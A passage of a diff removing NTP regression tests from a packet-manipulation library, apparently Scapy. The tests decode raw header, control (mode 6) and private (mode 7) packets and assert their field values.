-p = IP()/TCP()/NTP() -l = PacketList(p) -s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e -assert len(s) == 1 - -= NTP - sessions (2) -p = IP()/UDP()/NTP() -l = PacketList(p) -s = l.sessions() # Crashed on commit: e42ecdc54556c4852ca06b1a6da6c1ccbf3f522e -assert len(s) == 1 - -############ -############ -+ NTPHeader tests - -= NTPHeader - Basic checks -len(raw(NTP())) == 48 - - -= NTPHeader - Dissection -s = b"!\x0b\x06\xea\x00\x00\x00\x00\x00\x00\xf2\xc1\x7f\x7f\x01\x00\xdb9\xe8\xa21\x02\xe6\xbc\xdb9\xe8\x81\x02U8\xef\xdb9\xe8\x80\xdcl+\x06\xdb9\xe8\xa91\xcbI\xbf\x00\x00\x00\x01\xady\xf3\xa1\xe5\xfc\xd02\xd2j\x1e'\xc3\xc1\xb6\x0e" -p = NTP(s) -assert(isinstance(p, NTPHeader)) -assert(p[NTPAuthenticator].key_id == 1) -assert(bytes_hex(p[NTPAuthenticator].dgst) == b'ad79f3a1e5fcd032d26a1e27c3c1b60e') - - -= NTPHeader - KoD -s = b'\xe4\x00\x06\xe8\x00\x00\x00\x00\x00\x00\x02\xcaINIT\x00\x00\x00\x00\x00\x00\x00\x00\xdb@\xe3\x9eH\xa3pj\xdb@\xe3\x9eH\xf0\xc3\\\xdb@\xe3\x9eH\xfaL\xac\x00\x00\x00\x01B\x86)\xc1Q4\x8bW8\xe7Q\xda\xd0Z\xbc\xb8' -p = NTP(s) -assert(isinstance(p, NTPHeader)) -assert(p.leap == 3) -assert(p.version == 4) -assert(p.mode == 4) -assert(p.stratum == 0) -assert(p.ref_id == b'INIT') - - -= NTPHeader - Extension dissection test -s = b'#\x02\n\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\xdbM\xdf\x19e\x87\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdbM\xdf\x19e\x89\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPHeader)) -assert(p.leap == 0) -assert(p.version == 4) -assert(p.mode == 3) -assert(p.stratum == 2) - -= NTPAuthenticator - -s = hex_bytes("000c2962f268d094666d23750800450000640db640004011a519c0a80364c0a80305a51e007b0050731a2300072000000000000000000000000000000000000000000000000000000000000000000000000052c7bc1dda64b97d0000000bcdc3825dbf6b7ad02886ff45aa8b2eaf7ac78bc1") -p = Ether(s) -assert NTPAuthenticator in p and p[NTPAuthenticator].key_id == 3452142173 - - -############ -############ -+ NTP Control (mode 6) tests - -= NTP Control (mode 6) - CTL_OP_READSTAT (1) - request -s = b'\x16\x01\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 1) -assert(p.sequence == 12) -assert(p.status == 0) -assert(p.association_id == 0) -assert(p.offset == 0) -assert(p.count == 0) -assert(p.data == b'') - - -= NTP Control (mode 6) - CTL_OP_READSTAT (2) - response -s = b'\x16\x81\x00\x0c\x06d\x00\x00\x00\x00\x00\x04\xe5\xfc\xf6$' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 1) -assert(p.sequence == 12) -assert(isinstance(p.status_word, NTPSystemStatusPacket)) -assert(p.status_word.leap_indicator == 0) -assert(p.status_word.clock_source == 6) -assert(p.status_word.system_event_counter == 6) -assert(p.status_word.system_event_code == 4) -assert(p.association_id == 0) -assert(p.offset == 0) -assert(p.count == 4) -assert(isinstance(p.data, NTPPeerStatusDataPacket)) -assert(p.data.association_id == 58876) -assert(isinstance(p.data.peer_status, NTPPeerStatusPacket)) -assert(p.data.peer_status.configured == 1) -assert(p.data.peer_status.auth_enabled == 1) -assert(p.data.peer_status.authentic == 1) -assert(p.data.peer_status.reachability == 1) -assert(p.data.peer_status.reserved == 0) -assert(p.data.peer_status.peer_sel == 6) -assert(p.data.peer_status.peer_event_counter == 2) -assert(p.data.peer_status.peer_event_code == 4) - - -= NTP Control (mode 6) - CTL_OP_READVAR (1) - request -s = b'\x16\x02\x00\x12\x00\x00\xfc\x8f\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.op_code == 2) -assert(p.sequence == 18) -assert(p.status == 0) -assert(p.association_id == 64655) -assert(p.data == b'') - - -= NTP Control (mode 6) - CTL_OP_READVAR (2) - response (1st packet) -s = b'\xd6\xa2\x00\x12\xc0\x11\xfc\x8f\x00\x00\x01\xd4srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 1) -assert(p.op_code == 2) -assert(p.sequence == 18) -assert(isinstance(p.status_word, NTPPeerStatusPacket)) -assert(p.status_word.configured == 1) -assert(p.status_word.auth_enabled == 1) -assert(p.status_word.authentic == 0) -assert(p.status_word.reachability == 0) -assert(p.status_word.peer_sel == 0) -assert(p.status_word.peer_event_counter == 1) -assert(p.status_word.peer_event_code == 1) -assert(p.association_id == 64655) -assert(p.offset == 0) -assert(p.count == 468) -assert(p.data.load == b'srcadr=192.168.122.1, srcport=123, dstadr=192.168.122.100, dstport=123,\r\nleap=3, stratum=16, precision=-24, rootdelay=0.000, rootdisp=0.000,\r\nrefid=INIT, reftime=0x00000000.00000000, rec=0x00000000.00000000,\r\nreach=0x0, unreach=5, hmode=1, pmode=0, hpoll=6, ppoll=10, headway=62,\r\nflash=0x1200, keyid=1, offset=0.000, delay=0.000, dispersion=15937.500,\r\njitter=0.000, xleave=0.240,\r\nfiltdelay= 0.00 0.00 0.00 0.00 0.00 0.00 0.00 0.00,\r\nfiltoffset= 0.00 0.00 0.00 0.00 ') - - -= NTP Control (mode 6) - CTL_OP_READVAR (3) - response (2nd packet) -s = b'\xd6\x82\x00\x12\xc0\x11\xfc\x8f\x01\xd4\x00i0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 2) -assert(p.sequence == 18) -assert(isinstance(p.status_word, NTPPeerStatusPacket)) -assert(p.association_id == 64655) -assert(p.offset == 468) -assert(p.count == 105) -assert(p.data.load == b'0.00 0.00 0.00 0.00,\r\nfiltdisp= 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00 16000.00\r\n\x00\x00\x00') - - -= NTP Control (mode 6) - CTL_OP_READVAR (4) - request -s = b'\x16\x02\x00\x13\x00\x00s\xb5\x00\x00\x00\x0btest1,test2\x00\x00\x00\x00\x01=\xc2;\xc7\xed\xb9US9\xd6\x89\x08\xc8\xaf\xa6\x12' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 2) -assert(len(p.data.load) == 12) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'3dc23bc7edb9555339d68908c8afa612') - - -= NTP Control (mode 6) - CTL_OP_READVAR (5) - response -s = b'\xd6\xc2\x00\x13\x05\x00s\xb5\x00\x00\x00\x00\x00\x00\x00\x01\x97(\x02I\xdb\xa0s8\xedr(`\xdbJX\n' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 1) -assert(p.more == 0) -assert(p.op_code == 2) -assert(len(p.data.load) == 0) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'97280249dba07338ed722860db4a580a') - - -= NTP Control (mode 6) - CTL_OP_WRITEVAR (1) - request -s = b'\x16\x03\x00\x11\x00\x00\x00\x00\x00\x00\x00\x0btest1,test2\x00\x00\x00\x00\x01\xaf\xf1\x0c\xb4\xc9\x94m\xfcM\x90\tJ\xa1p\x94J' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 3) -assert(len(p.data.load) == 12) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'aff10cb4c9946dfc4d90094aa170944a') - - -= NTP Control (mode 6) - CTL_OP_WRITEVAR (2) - response -s = b'\xd6\xc3\x00\x11\x05\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x80z\x80\xfb\xaf\xc4pg\x98S\xa8\xe5xe\x81\x1c' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 1) -assert(p.more == 0) -assert(p.op_code == 3) -assert(hasattr(p, 'status_word')) -assert(isinstance(p.status_word, NTPErrorStatusPacket)) -assert(p.status_word.error_code == 5) -assert(len(p.data.load) == 0) -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'807a80fbafc470679853a8e57865811c') - - -= NTP Control (mode 6) - CTL_OP_CONFIGURE (1) - request -s = b'\x16\x08\x00\x16\x00\x00\x00\x00\x00\x00\x00\x0ccontrolkey 1\x00\x00\x00\x01\xea\xa7\xac\xa8\x1bj\x9c\xdbX\xe1S\r6\xfb\xef\xa4' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 8) -assert(p.count == 12) -assert(p.data.load == b'controlkey 1') -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'eaa7aca81b6a9cdb58e1530d36fbefa4') - - -= NTP Control (mode 6) - CTL_OP_CONFIGURE (2) - response -s = b'\xd6\x88\x00\x16\x00\x00\x00\x00\x00\x00\x00\x12Config Succeeded\r\n\x00\x00\x00\x00\x00\x01\xbf\xa6\xd8_\xf9m\x1e2l)<\xac\xee\xc2\xa59' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 8) -assert(p.count == 18) -assert(p.data.load == b'Config Succeeded\r\n\x00\x00') -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'bfa6d85ff96d1e326c293caceec2a539') - - -= NTP Control (mode 6) - CTL_OP_SAVECONFIG (1) - request -s = b'\x16\t\x00\x1d\x00\x00\x00\x00\x00\x00\x00\x0fntp.test.2.conf\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc9\xfb\x8a\xbe<`_\xfa6\xd2\x18\xc3\xb7d\x89#' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 9) -assert(p.count == 15) -assert(p.data.load == b'ntp.test.2.conf\x00') -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'c9fb8abe3c605ffa36d218c3b7648923') - - -= NTP Control (mode 6) - CTL_OP_SAVECONFIG (2) - response -s = b"\xd6\x89\x00\x1d\x00\x00\x00\x00\x00\x00\x00*Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00\x00\x00\x00\x012\xc2\xbaY\xc53\xfe(\xf5P\xe5\xa0\x86\x02\x95\xd9" -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 9) -assert(p.count == 42) -assert(p.data.load == b"Configuration saved to 'ntp.test.2.conf'\r\n\x00\x00") -assert(p.authenticator.key_id == 1) -assert(bytes_hex(p.authenticator.dgst) == b'32c2ba59c533fe28f550e5a0860295d9') - - -= NTP Control (mode 6) - CTL_OP_REQ_NONCE (1) - request -s = b'\x16\x0c\x00\x07\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 12) -assert(p.data == b'') -assert(p.authenticator == b'') - - -= NTP Control (mode 6) - CTL_OP_REQ_NONCE (2) - response -s = b'\xd6\x8c\x00\x07\x00\x00\x00\x00\x00\x00\x00 nonce=db4186a2e1d9022472e24bc9\r\n' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.more == 0) -assert(p.op_code == 12) -assert(p.data.load == b'nonce=db4186a2e1d9022472e24bc9\r\n') -assert(p.authenticator == b'') - - -= NTP Control (mode 6) - CTL_OP_READ_MRU (1) - request -s = b'\x16\n\x00\x08\x00\x00\x00\x00\x00\x00\x00(nonce=db4186a2e1d9022472e24bc9, frags=32' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 0) -assert(p.err == 0) -assert(p.op_code == 10) -assert(p.count == 40) -assert(p.data.load == b'nonce=db4186a2e1d9022472e24bc9, frags=32') -assert(p.authenticator == b'') - -= NTP Control (mode 6) - CTL_OP_READ_MRU (2) - response -s = b'\xd6\x8a\x00\x08\x00\x00\x00\x00\x00\x00\x00\xe9nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPControl)) -assert(p.version == 2) -assert(p.mode == 6) -assert(p.response == 1) -assert(p.err == 0) -assert(p.op_code == 10) -assert(p.count == 233) -assert(p.data.load == b'nonce=db4186a2e2073198b93c6419, addr.0=192.168.122.100:123,\r\nfirst.0=0xdb418673.323e1a89, last.0=0xdb418673.323e1a89, ct.0=1,\r\nmv.0=36, rs.0=0x0, WWQ.0=18446744073709509383, now=0xdb4186a2.e20ff8f4,\r\nlast.newest=0xdb418673.323e1a89\r\n\x00\x00\x00') -assert(p.authenticator == b'') - - -############ -############ -+ NTP Private (mode 7) tests - -= NTP Private (mode 7) - error - Dissection -s = b'\x97\x00\x03\x1d@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 29) -assert(p.err == 4) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_PEER_LIST (1) - request -s = b'\x17\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 0) -assert(p.nb_items == 0) -assert(p.data_item_size == 0) - - -= NTP Private (mode 7) - REQ_PEER_LIST (2) - response -s = b'\x97\x00\x03\x00\x00\x01\x00 \x7f\x7f\x01\x00\x00{\x03\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 0) -assert(p.nb_items == 1) -assert(p.data_item_size == 32) -assert(type(p.data[0]) == NTPInfoPeerList) -assert(p.data[0].addr) == "127.127.1.0" -assert(p.data[0].port) == 123 - - -= NTP Private (mode 7) - REQ_PEER_INFO (1) - request -s = b'\x17\x00\x03\x02\x00\x01\x00 \xc0\xa8zf\x00{\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 2) -assert(p.nb_items == 1) -assert(p.data_item_size == 32) -assert(isinstance(p.req_data[0], NTPInfoPeerList)) -assert(p.req_data[0].addr == "192.168.122.102") -assert(p.req_data[0].port == 123) - - -= NTP Private (mode 7) - REQ_PEER_INFO (2) - response -s = b'\x97\x00\x03\x02\x00\x01\x01\x18\xc0\xa8zf\xc0\xa8ze\x00{\x01\x03\x01\x00\x10\x06\n\xea\x04\x00\x00\xaf"\x00"\x16\x04\xb3\x01\x00\x00\x00\x00\x00\x00\x00INIT\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x82\x9d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdb<\x8d\xc5\xde\x7fB\x89\xdb<\x8d\xc5\xde\x7fB\x89\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x03\x04\x05\x06\x07\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 2) -assert(isinstance(p.data[0], NTPInfoPeer)) -assert(p.data[0].dstaddr == "192.168.122.102") -assert(p.data[0].srcaddr == "192.168.122.101") -assert(p.data[0].srcport == 123) -assert(p.data[0].associd == 1203) -assert(p.data[0].keyid == 1) - - -= NTP Private (mode 7) - REQ_PEER_LIST_SUM (1) - request -s = b'\x17\x00\x03\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 0) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) - - -= NTP Private (mode 7) - REQ_PEER_LIST_SUM (2) - response (1st packet) -s = b'\xd7\x00\x03\x01\x00\x06\x00H\n\x00\x02\x0f\xc0\x00\x02\x01\x00{\x10\x06\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\x00\x02\x02\x00{\x10\x06\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\xa8d\x01\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\xc0\xa8zg\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x02\x0f\xc0\xa8d\x02\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x02\xc0\xa8zh\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\n\x00\x02\x0f\xc0\xa8d\r\x00{\x10\x07\n\x00\x01\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zk\x00{\x01\x01\xc0\xa8ze\xc0\xa8zf\x00{\x0b\x06\x07\xf4\x83\x01\x00\x00\x07\x89\x00\x00\x00\x007\xb1\x00h\x00\x00o?\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zm\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) -assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) -assert(p.data[0].srcaddr == "192.0.2.1") - - -= NTP Private (mode 7) - REQ_PEER_LIST_SUM (3) - response (2nd packet) -s = b'\xd7\x01\x03\x01\x00\x06\x00H\xc0\xa8ze\xc0\xa8zg\x00{\x10\x08\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zg\x00{\x10\x08\n\x00\x11\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x01\x02\x01\x01\x01\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zh\x00{\x10\x08\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01eth0\xc0\xa8zg\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8ze\xc0\xa8zi\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x02\xc0\xa8zh\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xc0\xa8ze\xc0\xa8zj\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zk\x00{\x01\x01\xc0\xa8ze\xc0\xa8zk\x00{\x10\x07\n\x00\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\xfd\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\n\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc0\xa8zm\x00{\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00' -p = NTP(s) - -assert(isinstance(p, NTPPrivate)) -assert(p.response == 1) -assert(p.more == 1) -assert(p.version == 2) -assert(p.mode == 7) -assert(p.request_code == 1) -assert(isinstance(x, NTPInfoPeerSummary) for x in p.data) -assert(p.data[0].srcaddr == "192.168.122.103") - - -= NTP Private (mode 7) - REQ_PEER_LIST_SUM (3) - response (3rd packet) -s = 